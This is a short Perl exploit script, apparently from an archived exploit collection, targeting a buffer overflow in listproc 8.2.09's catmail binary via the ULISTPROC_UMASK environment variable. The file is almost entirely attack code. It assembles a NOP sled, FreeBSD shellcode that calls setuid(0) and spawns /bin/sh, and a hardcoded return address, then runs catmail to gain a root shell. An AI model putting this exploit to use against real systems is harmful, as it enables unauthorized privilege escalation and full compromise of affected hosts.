home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/perl -w
- # DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
- # as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
- # offset, retaddr and shellcode is for my FreeBSD 4.8-RELEASE, YMMV
- # shellcode by eSDee, hello there eSDee
- # dont forget to edit the path to the catmail binary
- # this yields uid(0) if listproc is installed by root, otherwise something else
-
- $len = 16534;
- $ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. ╜ eye)
- $nop = "\x90";
- $shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
- "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
- "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
-
- for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
- $buffer .= $nop;
- }
- $buffer .= $shellcode;
- $buffer .= $ret x 2;
- local($ENV{'ULISTPROC_UMASK'}) = $buffer;
- system("catmail");